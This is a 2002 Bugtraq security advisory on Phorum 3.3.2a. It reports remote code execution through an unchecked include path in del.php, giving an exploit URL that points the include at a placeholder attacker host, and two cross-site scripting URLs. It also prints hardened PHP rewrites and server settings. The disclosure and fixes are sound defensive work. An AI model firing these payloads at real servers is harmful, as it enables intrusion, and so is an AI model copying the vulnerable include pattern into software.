[25496] in bugtraq
Phorum 3.3.2a has another bug for remote command execution
daemon@ATHENA.MIT.EDU (Markus Arndt)
Sat May 18 13:30:04 2002
Date: Sat, 18 May 2002 12:32:56 +0200
Message-Id: <200205181032.g4IAWuX04533@mailgate5.cinetic.de>
MIME-Version: 1.0
From: "Markus Arndt" <markus-arndt@web.de>
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Target:
Phorum 3.3.2a (maybe older)
Description:
Phorum 3.3.2a lets remote users execute arbitrary code
Found by:
Markus Arndt<markus-arndt@web.de>
Vendor:
http://www.phorum.org
Notified Vendor:
Yes, already fixed in 3.3.2b
Details:
Another bug for remote command execution.
This time it's admin/actions/del.php
:)
Some code:
<?php
// $include_path is never set by this script; with register_globals enabled it
// comes straight from the request, so the query string decides what gets included.
require "$include_path/delete_message.php";
// $id is likewise unvalidated request input.
delete_messages($id);
QueMessage("Message(s) $id and all children were deleted!<br>");
?>
The URL to exploit the script would be:
http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls
That URL will make the script include http://[evilhost]/delete_message.php
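Added example, not Phorum's own code and not the 3.3.2b fix: a version of del.php where neither the include path nor the message id is taken from the request. It assumes PHP 5.4 or newer, that delete_messages() and QueMessage() exist as in the snippet above, and that the include directory sits at a fixed location relative to the script (PHORUM_INCLUDE_PATH is a name chosen here).

```php
<?php
// Hardened rewrite of admin/actions/del.php (example only, not Phorum's code).
// Assumes delete_messages() and QueMessage() exist as in the original script.

// Never let a request variable decide what gets included. With register_globals on,
// ?include_path=http://attacker/ would otherwise populate $include_path for free.
define('PHORUM_INCLUDE_PATH', __DIR__ . '/../../include');   // assumed layout

// Message ids are positive integers; reject anything else instead of passing it on.
// filter_input() returns null when the parameter is absent and false when invalid.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === null || $id === false) {
    http_response_code(400);
    exit('Invalid message id');
}

require PHORUM_INCLUDE_PATH . '/delete_message.php';
delete_messages($id);

// $id is an int here, but encoding before it is echoed into HTML costs nothing
// and keeps the habit consistent with the other admin pages.
QueMessage('Message(s) ' . htmlspecialchars((string) $id, ENT_QUOTES, 'UTF-8')
    . ' and all children were deleted!<br>');
```

Defence in depth on the server side would have stopped this class as well: register_globals=Off removes the path by which the query string becomes $include_path, and allow_url_fopen=Off (PHP 4) or allow_url_include=Off (PHP 5.2 and later) stops require from fetching a file over HTTP at all.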
GoGoGo and secure your boxes. :)
One other thing before I forget:
CSS (cross-site scripting) attacks are possible on 2 files:
http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>
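Added example, not Phorum's code: how header.php and footer.php could render the status message so that a value like the one in the URLs above is displayed as text rather than executed. It assumes PHP 7.0 or newer, that the message is supplied by the application (for instance from QueMessage) and not read from the request, and that phorum_status_message is a name chosen here.

```php
<?php
// Safe rendering of the admin status message (example only, not Phorum's code).

// With register_globals on, a request like ?GLOBALS[message]=... overwrites $GLOBALS['message'].
// Do not read the message from the request at all: the caller passes in whatever the
// application queued server-side, and this function only takes care of output encoding.
function phorum_status_message(string $message): string
{
    if ($message === '') {
        return '';
    }
    // HTML-encode so <, >, " and ' cannot open a tag or break out of an attribute.
    return '<div class="PhorumAdminMessage">'
        . htmlspecialchars($message, ENT_QUOTES, 'UTF-8')
        . '</div>';
}

// Constructed inputs: a normal status message and the payload from this advisory.
echo phorum_status_message('Message(s) 42 and all children were deleted!'), "\n";
echo phorum_status_message('<script>alert("css strikes!");</script>'), "\n";
```

For the second call the angle brackets and quotes come out as &lt;, &gt; and &quot;, so the browser shows the payload as literal text inside the div. The encoding belongs at the point of output; validating the message on the way in does not help when register_globals lets the request bypass that path entirely.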
Markus Arndt<markus-arndt@web.de>
http://skka.de